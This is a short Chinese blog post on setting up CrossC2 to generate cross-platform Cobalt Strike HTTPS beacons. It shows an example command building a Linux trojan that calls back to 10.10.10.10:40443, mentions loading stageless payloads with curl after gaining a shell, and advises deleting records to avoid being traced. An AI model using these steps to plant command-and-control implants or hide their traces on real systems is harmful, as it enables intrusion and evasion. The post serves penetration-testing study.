m0nk3y's Blog @ D0g3 HomeArchivesTagsCategoriesAboutFriendsTalk
CobaltStrike:CrossC2相关知识
Word count: 438|Reading time: 1 min

今天和亮亮还有豪哥提了下CS,发现我连CrossC2都还没装。。。有时候真心建议去看官方文档,别去找教程,看了几个教程全tm都是坑。。。

具体介绍看下面

https://github.com/gloxec/CrossC2/blob/cs4.1/README_zh.md

一些限制,要cs4.1及以上。

  • Only CS 4.x (>=4.1) version is supported, lower versions will no longer be supported.

简单说,CrossC2就是一个跨平台的上线,Linux、MacOS、iOS、Android。

CrossC2 framework - 生成CobaltStrike的跨平台beacon

  • 由于 Cross C2目前只支持HTTPS Beacon,所以在Listenrs中选择HTTPS进行监听,
    服务端开启监听 windows/beacon_https/reverse_https 类型的beacon(强制HTTPS

如何使用?

  1. 将s端的.cobaltstrike.beacon_keys 下载到c端目录下。

  1. 将CrossC2.cna、genCrossC2.Linux两个文件复制到Cobalt Strike服务端(必须处于同一目录)

根据目标客户端,利用相应的CrossC2文件,生成上线文件(可执行文件,需要给x权限)

测试:以kali来测试。

生成上线可执行文件(木马)

1
2
3
4
5
6
[usage]: ./genCrossC2.Linux [host] [port] [getURI] [postURI] [platform] [arch] [outputFileName]

         -platform        'MacOS' / 'Linux'
         -arch            'x86' / 'x64'

[ex]:    ./genCrossC2.Linux 10.10.10.10 40443 null null Linux x64 C2

上面这个都是老方法,非常不推荐。

要记得给genCrossC2.MacOS x 权限,不然没办法。。我傻逼,在这里都能卡住。

然后在kali 上运行可执行文件(木马)

  • 拿到shell之后,上传生成的可执行文件,然后运行
  • Stageless,命令行curl远程加载即可,不过这样可能会注意一下删除记录,否则如意被溯源

我还问了下long716师傅,为什么Stageless 这种不行,结果我换个端口就好了。傻逼了

成功上线。

当然不仅仅这些。

Author: m0nk3y
Link: https://hack-for.fun/67f2.html
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
CobaltStrike渗透测试